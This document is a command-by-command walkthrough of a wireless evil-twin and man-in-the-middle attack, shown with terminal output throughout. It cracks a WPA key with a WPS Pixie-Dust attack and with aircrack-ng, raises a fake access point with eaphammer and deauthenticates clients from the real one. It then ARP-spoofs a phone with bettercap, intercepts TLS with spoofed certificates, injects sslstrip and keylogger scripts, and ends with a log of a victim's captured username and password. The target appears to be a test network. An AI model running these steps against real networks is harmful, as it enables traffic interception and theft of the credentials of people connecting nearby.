

Evil Twin + MITM

Pre-Requisite:

- 1) Alfa Card
- 2) Kali Operating System

Bettercap Installation:

- sudo apt install bettercap
- sudo apt install ettercap-graphical
- sudo apt install eaphammer

eaphammer Installation:

- sudo apt install eaphammer

Alfacard Drivers installation

- sudo apt install linux-headers-\$(uname -r)
- sudo apt install linux-headers-6.10.11-amd64*
- sudo init 6 (A reboot is required)
- sudo apt install realtek-rtl88xxau-dkms
- sudo apt install dkms
- git clone <https://github.com/aircrack-ng/rtl8812au>
 - cd rtl8812au
 - make
 - sudo make install

sudo ip addr add 192.168.1.1/24 dev wlan0 #set IP address mandatory

```
└─(kali㉿kali)-[~]
```

```
└─$ cat /etc/dnsmasq.d/dnsmasq.conf
```

```
interface=wlan0
```

```
dhcp-range=192.168.1.10,192.168.1.50,12h #<---- wlan0 IP addresses that will be distributed to the victim devices
```

```
dhcp-option=3,192.168.1.1 #<-- wlan0 ip as gateway
```

```
dhcp-option=6,8.8.8.8,8.8.4.4
```

```
server=8.8.8.8
```

```
log-queries
```

```
log-dhcp
```

```
#dnsmasq -C /etc/dnsmasq.d/dnsmasq.conf
```

```
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
```

```
sudo eaphammer --interface wlan0 -e "TargetNetwork_PlsDntCnt" --auth wpa-psk --wpa-passphrase
"Test@12345" --creds --lhost 192.168.1.1 #<-- IP of wlan0(gw)
```

```
sudo bettercap -iface wlan0
```

Configuring the Evil Twin Fake Access point:

There are other good tools such as airgeddon, fluxion and traditional tools(Airmon, airodump, airplay and etc). For this scenario we will be using eaphammer for creating fake access point. Before jumping on to the practical we need to identify our target.

Identifying target:

```
(kali@kali)-[~]
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
        valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
        valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:59:b8:18 brd ff:ff:ff:ff:ff:ff
    inet 10.10.33.129/24 brd 10.10.33.255 scope global dynamic noprefixroute eth0
        valid_lft 1682sec preferred_lft 1682sec
    inet6 fe80::7a84:a82a:23d6:f3d6/64 scope link noprefixroute
        valid_lft forever preferred_lft forever
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 2312 qdisc mq state UP group default qlen 1000
    link/ether 82:ff:05:c0:1a:b1 brd ff:ff:ff:ff:ff:ff permaddr 00:c0:ca:b6:68:b5

(kali@kali)-[~]
$ sudo airmon-ng start wlan0
[sudo] password for kali:

Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    671 NetworkManager
    2428 wpa_supplicant
    2437 hostapd

PHY      Interface      Driver      Chipset
phy0     wlan0            88XXau      Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter
          (monitor mode enabled)
```

```
sudo airodump-ng wlan0
```

```

(kali@kali)-[~]
$ sudo airodump-ng wlan0

CH 13 ][ Elapsed: 0 s ][ 2024-11-28 02:25

BSSID                PWR  Beacons    #Data, #/s  CH  MB  ENC CIPHER  AUTH ESSID
F0:61:C0:00:00:00    -1      0         0   0  13   -1          WPA2 CCMP  PSK  <length: 0>
84:D4:7E:00:00:00   -39      5         0   0  12  130        WPA2 CCMP  PSK  SOCFloorAV
FC:DD:55:00:00:00   -21      5         0   0  11  130        WPA2 CCMP  PSK  Airtel-MyWiFi-AMF-311WW-EB87
BC:30:7E:00:00:00   -42      4         0   0   9  270         OPN          WiPG-2000-2F3
F0:61:C0:00:00:00   -61      2         0   0   1  260        WPA2 CCMP  PSK  wifi-iot
F0:61:C0:00:00:00   -62      2         0   0   1  260        WPA2 CCMP  MGT  wifi-innovate
9C:8C:D8:00:00:00   -62      3         0   0   1  260        WPA2 CCMP  MGT  wifi-internet
F0:61:C0:00:00:00   -45      4         0   0   1  260        WPA2 CCMP  MGT  wifi-internet
F0:61:C0:00:00:00   -62      2         0   0   1  260        WPA2 CCMP  MGT  wifi-internet
9C:8C:D8:00:00:00   -62      5         0   0   1  260        WPA2 CCMP  MGT  wifi-innovate
9C:8C:D8:00:00:00   -63      3         0   0   1  260        WPA2 CCMP  PSK  wifi-iot
9C:8C:D8:00:00:00   -63      2         0   0   1  260         OPN          wifi-guest
F0:61:C0:00:00:00   -22      6         0   0   1  260        WPA2 CCMP  MGT  wifi-innovate
F0:61:C0:00:00:00   -22      6         0   0   1  260        WPA2 CCMP  PSK  wifi-iot
F0:61:C0:00:00:00   -23      6         0   0   1  260        WPA2 CCMP  MGT  wifi-internet
F0:61:C0:00:00:00   -23      5         0   0   1  260         OPN          wifi-guest
F0:61:C0:00:00:00   -46      5         0   0   1  260        WPA2 CCMP  MGT  wifi-innovate
F0:61:C0:00:00:00   -45      5         0   0   1  260        WPA2 CCMP  PSK  wifi-iot
F0:61:C0:00:00:00   -48      4         0   0   1  260         OPN          wifi-guest
F0:61:C0:00:00:00   -56      5         0   0   1  260        WPA2 CCMP  MGT  wifi-innovate
F0:61:C0:00:00:00   -58      5         0   0   1  260        WPA2 CCMP  PSK  wifi-iot
F0:61:C0:00:00:00   -56      5         0   0   1  260        WPA2 CCMP  MGT  wifi-internet
F0:61:C0:00:00:00   -55      6         0   0   1  260         OPN          wifi-guest
76:C6:3B:00:00:00   -57      3         0   0   1  130        WPA2 CCMP  PSK  DIRECT-AJHUB-B11CD2022msHP
28:24:FF:00:00:00   -39     12         0   0   2  270         OPN          wePresent-DD2
54:AF:97:C4:04:2E    -7     14         0   0   3  130        WPA2 CCMP  PSK  Accenture_ProdSec
54:AF:97:C4:04:2E   -46      4         0   0   1  130        WPA3 CCMP  SAE  Pixel_4797

```

sudo wifite --kill

```

(kali@kali)-[~]
└─$ sudo wifite --kill

  . . . . .
  : : : ( ) : : :
  . . . . .
  / \
 /   \
/     \

wifite2 2.7.0
a wireless auditor by derv82
maintained by kimocoder
https://github.com/kimocoder/wifite2

[+] option: kill conflicting processes enabled
[+] Using wlan0 already in monitor mode

NUM          ESSID          CH  ENCR  PWR  WPS  CLIENT
-----
1      (00:A0:0A: [REDACTED]  1  WPA   99db  no    1
2      wifi-internet      1  WPA-E 76db  no
3      wifi-innovate      1  WPA-E 76db  no
4      wifi-iot           1  WPA-P 75db  no
5  Airtel-MyWiFi-AMF-311... 11  WPA-P 72db  yes
6      SOCFloorAV        12  WPA-P 62db  no
7      My Airtel Wi-Fi    6   WPA-E 54db  no
8      Pixel_4797        1   WPA-P 54db  no
9      wifi-iot           1   WPA-P 53db  no
10  realme GT Master Edition 1   WPA-P 52db  no
11     wifi-internet      1   WPA-E 51db  no
12     wifi-innovate      1   WPA-E 51db  no
13     POCO X4 Pro 5G      1   WPA-P 50db  no
14     wifi-innovate      1   WPA-E 45db  no
15     wifi-internet      1   WPA-E 44db  no
16     wifi-iot           1   WPA-P 41db  no
17  DIRECT-AJHUB-B11CD202... 1   WPA-P 40db  yes
18     wifi-iot           1   WPA-P 38db  no
19     wifi-internet      1   WPA-E 36db  no
20     wifi-innovate      1   WPA-E 36db  no
21     wifi-iot           1   WPA-P 35db  no
22     wifi-internet      1   WPA-E 31db  no
23  Accenture_ProdSec      3   WPA-P 5db   yes ←

[+] Select target(s) (1-23) separated by commas, dashes or all: 23

[+] (1/1) Starting attacks against 54:AF:97:C4:04:2E (Accenture_ProdSec)
[+] Accenture_ProdSec (2db) WPS Pixie-Dust: [4m53s] Cracked WPS PIN: 38643408 PSK: Test@12345
[+] ESSID: Accenture_ProdSec
[+] BSSID: 54:AF:97:C4:04:2E
[+] Encryption: WPA (WPS)
[+] WPS PIN: 38643408
[+] PSK/Password: Test@12345 ←
[+] saved crack result to cracked.json (1 total)
[+] Finished attacking 1 target(s), exiting

```

```

sudo airodump-ng -bssid 54:AF:97:C4:04:2E -channel 3 -write capture wlan0

```

```
(kali@kali)-[~]
└─$ sudo airodump-ng --bssid 54:AF:97:C4:04:2E --channel 3 --write capture wlan0
04:21:59 Created capture file "capture-02.cap".

CH 3 ][ Elapsed: 1 min ][ 2024-11-28 04:23 ][ WPA handshake: 54:AF:97:C4:04:2E

BSSID          PWR RXQ Beacons    #Data, #/s  CH  MB  ENC CIPHER AUTH ESSID
54:AF:97:C4:04:2E  9   0      872      188   5   3  130  WPA2 CCMP PSK Accenture_Pro

BSSID          STATION          PWR   Rate    Lost  Frames  Notes  Probes
54:AF:97:C4:04:2E F2:1E:28:5E:F9:69 -13   1e- 1e    0      802  EAPOL

Quitting...
```

sudo aireplay-ng -deauth 0 -a 54:AF:97:C4:04:2E wlan1

```
(kali@kali)-[~]
└─$ sudo aireplay-ng --deauth 0 -a 54:AF:97:C4:04:2E wlan1
04:21:38 Waiting for beacon frame (BSSID: 54:AF:97:C4:04:2E) on channel 3
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
04:21:41 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:42 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:42 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:42 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:43 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:43 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:44 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:44 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:45 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:45 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:46 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:46 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:47 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:47 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:47 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:48 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:48 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:49 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:49 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:50 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
04:21:50 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
```

sudo aircrack-ng capture-01.cap -w pass_file_two

```

(kali㉿kali)-[~]
└─$ sudo aircrack-ng capture-01.cap -w pass_file_two
Reading packets, please wait...
Opening capture-01.cap
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Read 24179 packets.

#   BSSID                ESSID                Encryption
1   54:AF:97:C4:04:2E    Accenture_ProdSec    WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening capture-01.cap
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Read 24179 packets.

1 potential targets

                                Aircrack-ng 1.7

[00:00:21] 99013/100002 keys tested (4770.43 k/s)

Time left: 0 seconds                                99.01%

                                KEY FOUND! [ Test@12345 ]

Master Key      : D0 3D 81 A8 AE DF 06 C6 65 25 42 A3 6C 28 45 3F
                  9D 35 34 00 6C B5 61 BF 13 18 49 55 0B 7E 3D D1

Transient Key   : CF 2E 23 08 84 BC 43 84 B7 78 02 A5 DE 95 1A ED
                  12 DF E3 51 D5 49 1A 8F 9C A1 D4 8C 56 A6 31 FE
                  BA 6E A0 33 4B 25 86 89 4B D2 7C 9B 6B C4 CA 2C
                  CE 6E 0D B8 83 FD 91 3B 61 53 8C 3C 88 D6 1B A6

EAPOL HMAC      : 9B 94 EA 77 F1 4C F7 96 0E 51 79 3C E8 AE 63 2C

```

```
sudo ip addr add 192.168.1.1/24 dev wlan0
```

```

valid_ltc forever preferred_ltc forever
3: wlan0: <BROADCAST,ALLMULTI,PROMISC,NOTRAILERS,UP,LOWER_UP> mtu 2312 qdisc mq state UP group
p default qlen 1000
    link/ieee802.11/radiotap 7c:e4:aa:97:e8:0b brd ff:ff:ff:ff:ff:ff permaddr 00:c0:ca:b6:68:
b5
4: wlan1: <NO-CARRIER,BROADCAST,ALLMULTI,PROMISC,NOTRAILERS,UP,LOWER_UP> mtu 2312 qdisc mq st
ate DORMANT group default qlen 1000
    link/ieee802.11/radiotap 76:4e:d4:f3:6b:3e brd ff:ff:ff:ff:ff:ff permaddr 00:c0:ca:b6:68:
bb

(kali@kali)~$ sudo ip addr add 192.168.1.1/24 dev wlan0

```

ifconfig wlan0

```

(kali@kali)~$ ifconfig wlan0
wlan0: flags=867<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,ALLMULTI> mtu 2312
    inet 192.168.1.1 netmask 255.255.255.0 broadcast 0.0.0.0
    unspec 7C-E4-AA-97-E8-0B-00-27-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
    RX packets 1146710 bytes 0 (0.0 B)
    RX errors 0 dropped 1044227 overruns 0 frame 0
    TX packets 3856 bytes 437162 (426.9 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

```

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

```

(kali@kali)~$ echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
[sudo] password for kali:
1

```

sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED, ESTABLISHED -j ACCEPT

sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT

```

(kali@kali)~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

(kali@kali)~$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT

(kali@kali)~$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT

```

```
sudo eaphammer -interface wlan0 -e "Accenture_ProdSec" --auth wpa-psk --wpa-passphrase "Test@12345" --creds --lhost 192.168.1.1
```

```
(kali@kali)~$ sudo eaphammer --interface wlan0 -e "Accenture_ProdSec" --auth wpa-psk --wpa-passphrase "Test@12345" --creds --lhost 192.168.1.1

Now with more fast travel than a next-gen Bethesda game. >:D

Version: 1.14.0
Codename: Final Frontier
Author: @s0lstic3
Contact: gabriel<at>transmitengage.com

[?] Am I root?
[*] Checking for rootness...
[*] I AM R000000000000000T
[*] Root privs confirmed! 8D
[*] Saving current iptables configuration...
[*] Reticulating radio frequency splines...

[*] Using nmcli to tell NetworkManager not to manage wlan0...

100% | 1/1 [00:01<00:00, 1.00s/it]

[*] Success: wlan0 no longer controlled by NetworkManager.
[*] WPA handshakes will be saved to /var/lib/eaphammer/loot/wpa_handshake_capture-2024-11-28-06-58-09-0n0uVTyqK9Gqt6Fv2ULKkHFM1jqTl0tj.hccapx

[hostapd] AP starting...

Configuration file: /var/lib/eaphammer/tmp/hostapd-2024-11-28-06-58-09-wCGsHfzZ0e9gUAEQYqPrCWMoRlGhFR0i.conf
wlan0: interface state UNINITIALIZED->COUNTRY_UPDATE
Using interface wlan0 with hwaddr 08:11:22:33:44:00 and ssid "Accenture_ProdSec"
wlan0: interface state COUNTRY_UPDATE->ENABLED
```

```
sudo aireplay-ng --deauth 0 -a 54:AF:97:C4:04:2E wlan1
```

```
kali@kali:~$ sudo eaphammer --interface wlan0 -e "Accenture_ProdSec" --auth wpa-psk --wpa-passphrase "Test@12345" --creds --lhost 192.168.1.1

Now with more fast travel than a next-gen Bethesda game. >:D

Version: 1.14.0
Codename: Final Frontier
Author: @s0lstic3
Contact: gabriel<at>transmitengage.com

[?] Am I root?
[*] Checking for rootness...
[*] I AM R000000000000000T
[*] Root privs confirmed! 8D
[*] Saving current iptables configuration...
[*] Reticulating radio frequency splines...

[*] Using nmcli to tell NetworkManager not to manage wlan0...

100% | 1/1 [00:01<00:00, 1.00s/it]

[*] Success: wlan0 no longer controlled by NetworkManager.
[*] WPA handshakes will be saved to /var/lib/eaphammer/loot/wpa_handshake_capture-2024-11-28-07-06-56-kzuS5p718yOYPj31546YNiJkCyls017.hccapx

[hostapd] AP starting...

Configuration file: /var/lib/eaphammer/tmp/hostapd-2024-11-28-07-06-56-q4IXYxZASvxB5Z285uRgAXhiiZcrvX3a.conf
wlan0: interface state UNINITIALIZED->COUNTRY_UPDATE
Using interface wlan0 with hwaddr 08:11:22:33:44:00 and ssid "Accenture_ProdSec"
wlan0: interface state COUNTRY_UPDATE->ENABLED
wlan0: AP-ENABLED

Press enter to quit...

wlan0: STA 5a:c5:8a:88:05:14 IEEE 802.11: associated
[EAPHAMMER] Captured a WPA/2 handshake from: 5a:c5:8a:88:05:14
[EAPHAMMER] Captured a WPA/2 handshake from: 5a:c5:8a:88:05:14
wlan0: AP-STA-CONNECTED 5a:c5:8a:88:05:14
wlan0: STA 5a:c5:8a:88:05:14 WPA: pairwise key handshake completed (RSN)

kali@kali:~$ sudo aireplay-ng --deauth 0 -a 54:AF:97:C4:04:2E wlan1
07:07:26 Waiting for beacon frame (BSSID: 54:AF:97:C4:04:2E) on channel 3
NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>).
07:07:26 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:27 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:27 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:28 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:28 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:29 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:29 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:30 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:30 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:31 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:31 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:32 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:32 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:32 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:33 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:33 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:34 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:34 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:35 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:35 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:36 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:36 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:37 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:37 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:37 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:38 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:38 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:39 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:39 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:40 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:40 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:41 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:41 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:42 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
07:07:42 Sending DeAuth (code 7) to broadcast -- BSSID: [54:AF:97:C4:04:2E]
```

```
sudo bettercap -iface wlan0
```


- net.probe on
- set arp.spoof.targets 192.168.1.11
- arp.spoof on
- hstshijack/hstshijack

```
(kali@kali)~$ sudo bettercap -iface wlan0
bettercap v2.33.0 (built for linux amd64 with go1.22.6) [type 'help' for a list of commands]

192.168.1.0/24 > 192.168.1.1 » [07:07:59] [sys.log] [wan] Could not find mac for
192.168.1.0/24 > 192.168.1.1 » net.probe on
[07:08:14] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
192.168.1.0/24 > 192.168.1.1 » [07:08:14] [sys.log] [inf] net.probe probing 256 addresses on 192.168.1.0/24
192.168.1.0/24 > 192.168.1.1 » [07:08:15] [endpoint.new] endpoint 192.168.1.11 detected as 5a:c5:8a:88:05:14.
192.168.1.0/24 > 192.168.1.1 » set arp.spoof.targets 192.168.1.11
192.168.1.0/24 > 192.168.1.1 » arp.spoof on
192.168.1.0/24 > 192.168.1.1 » [07:08:37] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
192.168.1.0/24 > 192.168.1.1 » hstshijack/hstshijack
2024-11-28 07:09:56 inf hstshijack Generating random variable names for this session ...
2024-11-28 07:09:56 inf hstshijack Reading caplet ...
2024-11-28 07:09:56 inf hstshijack Indexing SSL domains ...
2024-11-28 07:09:56 inf hstshijack Indexed 2 domains.
2024-11-28 07:09:56 inf hstshijack Module loaded.

Caplet

hstshijack.ssl.domains > /usr/share/bettercap/caplets/hstshijack/domains.txt
hstshijack.ssl.index > /usr/share/bettercap/caplets/hstshijack/index.json
hstshijack.ssl.check > true
hstshijack.ignore > captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.com
hstshijack.targets > google.com,*.google.com,gstatic.com,*.gstatic.com
hstshijack.replacements > google.corn,*.google.corn,gstatic.corn,*.gstatic.corn
hstshijack.blockscripts > undefined
hstshijack.obfuscate > true
hstshijack.payloads > */usr/share/bettercap/caplets/hstshijack/payloads/hijack.js
> */usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.js
> */usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js
> *.google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js
> google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js

Commands

hstshijack.show : Show module info.
hstshijack.ssl.domains : Show recorded domains with SSL.
hstshijack.ssl.index : Show SSL domain index.
```

- https.proxy on

- net.sniff on
- events.stream on

```

kali@kali: ~
Session info
  Session ID : 00pgccKjIaNkJdv
  Callback path : /DYjczIig
  Whitelist path : /IfGEGqfhAEJSn
  SSL index path : /SEmZYLZg
  SSL domains : 2 domains

[07:09:56] [sys.log] [inf] http.proxy started on 192.168.1.1:8080 (sslstrip disabled)
[07:09:56] [sys.log] [inf] dns.spoof *google.corn -> 192.168.1.1
[07:09:56] [sys.log] [inf] dns.spoof google.corn -> 192.168.1.1
192.168.1.0/24 > 192.168.1.1 » [07:09:56] [sys.log] [inf] dns.spoof *gstatic.corn -> 192.168.1.1
192.168.1.0/24 > 192.168.1.1 » [07:09:56] [sys.log] [inf] dns.spoof gstatic.corn -> 192.168.1.1
192.168.1.0/24 > 192.168.1.1 » https.proxy on
[07:10:15] [sys.log] [inf] https.proxy loading proxy certification authority TLS key from /root/.bettercap-ca.key.pem
[07:10:15] [sys.log] [inf] https.proxy loading proxy certification authority TLS certificate from /root/.bettercap-ca.cert.pem
192.168.1.0/24 > 192.168.1.1 » [07:10:15] [sys.log] [inf] https.proxy started on 192.168.1.1:8083 (sslstrip disabled)
192.168.1.0/24 > 192.168.1.1 » [07:11:03] [sys.log] [inf] https.proxy creating spoofed certificate for dit.whatsapp.net:443
192.168.1.0/24 > 192.168.1.1 » [07:11:03] [sys.log] [war] https.proxy error reading SNI: unexpected message.
192.168.1.0/24 > 192.168.1.1 » [07:11:04] [sys.log] [war] https.proxy error reading SNI: EOF.
192.168.1.0/24 > 192.168.1.1 » [07:11:06] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2024-11-28 07:11:06.011926128 -0500 EST m=+186.7025455
97 {192.168.1.11 GET e6.i.lencr.org / 1115}}
192.168.1.0/24 > 192.168.1.1 » [07:11:07] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2024-11-28 07:11:07.082219631 -0500 EST m=+187.7728390
99 {192.168.1.11 GET x1.i.lencr.org / 1391}}
192.168.1.0/24 > 192.168.1.1 » [07:11:16] [sys.log] [inf] https.proxy creating spoofed certificate for media-lhr6-1.cdn.whatsapp.net:443
192.168.1.0/24 > 192.168.1.1 » [07:11:19] [sys.log] [inf] https.proxy creating spoofed certificate for media-dub4-1.cdn.whatsapp.net:443
192.168.1.0/24 > 192.168.1.1 » [07:11:20] [sys.log] [inf] https.proxy creating spoofed certificate for mmg.whatsapp.net:443
192.168.1.0/24 > 192.168.1.1 » [07:11:27] [sys.log] [inf] https.proxy creating spoofed certificate for media-lhr6-2.cdn.whatsapp.net:443
192.168.1.0/24 > 192.168.1.1 » net.sniff on
192.168.1.0/24 > 192.168.1.1 » [07:11:30] [net.sniff.https] sni 192.168.1.11 > https://media-lhr6-2.cdn.whatsapp.net
192.168.1.0/24 > 192.168.1.1 » [07:11:31] [net.sniff.https] sni 192.168.1.11 > https://media-dub4-1.cdn.whatsapp.net
192.168.1.0/24 > 192.168.1.1 » [07:11:33] [net.sniff.https] sni 192.168.1.11 > https://mmg.whatsapp.net
192.168.1.0/24 > 192.168.1.1 » events.stream on
192.168.1.0/24 > 192.168.1.1 » [07:11:37] [sys.log] [err] module events.stream is already running
192.168.1.0/24 > 192.168.1.1 » [07:12:06] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.11 : chat.cdn.whatsapp.net is 157.240.214.61
192.168.1.0/24 > 192.168.1.1 » [07:12:07] [net.sniff.https] sni 192.168.1.11 > https://dit.whatsapp.net
192.168.1.0/24 > 192.168.1.1 » [07:12:07] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.11 : media-lhr8-2.cdn.whatsapp.net is 157.240.214.60
192.168.1.0/24 > 192.168.1.1 » [07:12:07] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.11 : mmx-ds.cdn.whatsapp.net is 157.240.214.60
192.168.1.0/24 > 192.168.1.1 » [07:12:08] [sys.log] [inf] https.proxy creating spoofed certificate for media-lhr8-2.cdn.whatsapp.net:443
192.168.1.0/24 > 192.168.1.1 » [07:12:08] [net.sniff.https] sni 192.168.1.11 > https://media-lhr8-2.cdn.whatsapp.net

```

We can see credentials in plain text format.

```

192.168.1.0/24 > 192.168.1.1 » 2024-11-28 07:13:56 [inf] [htstshjack] Callback received from 192.168.1.11 for init3hacker.com

[htstshjack.callback] CALLBACK http://init3hacker.com/DYjczIig?=Administrator&Test%4012346MgUaNuILurh=A%2Cd%2Cm%2Ci%2Cn%2Ci%2Cs%2Ct%2Cr%2Ca%2Ct%2Co%2C%2Ct%2CBackspace%2CShift%2CT%2Ce%2Cs%2Ct%2C%40%2C1%2C2%2C3%2C4%2C5

Headers
  Connection: keep-alive
  Accept: */*
  Accept-Language: en-IN,en-GB;q=0.9,en;q=0.8
  Referer: http://init3hacker.com/
  Pragma: no-cache
  Origin: http://init3hacker.com
  Content-Length: 0
  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1

Query
  : Administrator
  : Test@1234
  MgUaNuILurh : A,d,m,i,n,i,s,t,r,a,t,o,r,t,Backspace,Shift,T,e,s,t,0,1,2,3,4,5

Body

[07:13:56] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2024-11-28 07:13:56.798576658 -0500 EST m=+357.489196116 {192.168.1.11 POST init3hacker.com /DYjczIig 0}}
